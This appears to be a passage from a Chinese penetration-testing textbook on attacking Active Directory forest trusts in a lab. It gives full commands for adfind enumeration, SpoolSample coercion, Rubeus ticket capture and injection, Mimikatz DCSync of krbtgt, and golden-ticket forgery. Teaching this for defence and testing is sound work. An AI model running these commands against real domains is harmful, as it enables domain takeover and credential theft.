域林信任环境搭建如下：

当前林域控：dc.a.com (Windows Server 2012 R2)

目标林域控：bdc.b.com (Windows Server 2012 R2)

当前域域控：adc1.a.com (Windows Server 2012 R2)

目标域域控：bdc1.b.com (Windows Server 2012 R2)

外部信任环境外部信任，如图7-16所示。

图 7-16 信任关系

外部信任和林信任因为存在sid过滤所以无法利用SID History获取权限，但是至少我们可以查询到任何正常的活动目录信息，甚至可以实施跨信任边界的kerberosating攻击。

使用adfind工具可以获取信任域的完整信息，这里以获取Administrator用户的详细信息为例。输入下列命令，我们可以导出全部用户的信息，然后通过对比目标域和当前域的用户列表，查找同时加入了两个域的用户，尝试这些用户是否具有目标域的权限，如图7-17所示。

adfind下载地址：http://www.joeware.net/freetools/tools/adfind/。

adfind -h bdc1.b.com -sc u:Administrator

图 7-17获取信任域的完整信息

Get-DomainForeignGroupMember -Domain B.com

图 7-18 列出加入目标域用户组的外部用户

如果我们已经获取了森林中某个域控(或者配置了无约束委派的任何服务器)的权限，可以使用MS-RPRN的RpcRemoteFindFirstPrinterChangeNotification(Ex)方法来强迫信任林的域控向我们控制的服务器发起身份认证请求，然后利用捕捉到的票据获取信任林任意用户的哈希，进而获取目标林的权限。

Rubeus.exe monitor /interval:5 /filteruser:BDC$

图 7-19监控身份认证请求

SpoolSample bdc.b.com dc.a.com

图 7-20发起身份认证请求

图 7-21捕捉认证请求并保存

Rubeus.exe ptt /ticket:XXXX

图 7-22票据注入到内存

Mimikatz.exe “lsadump::dcsync /domain:B.com /user:B\krbtgt” exit

图 7-23获取目标域的kebtgt哈希

Mimikatz.exe “Kerberos::golden /user:Administrator /domain:B.com /sid:S-1-5-21-1163464416-126101326-234308999 /rc4:0d96891dc4749658f448e1ed26aa2f4d /ptt” exit

dir \\bdc.b.com\C$

图 7-24构造黄金票据注入内存并获取目标权限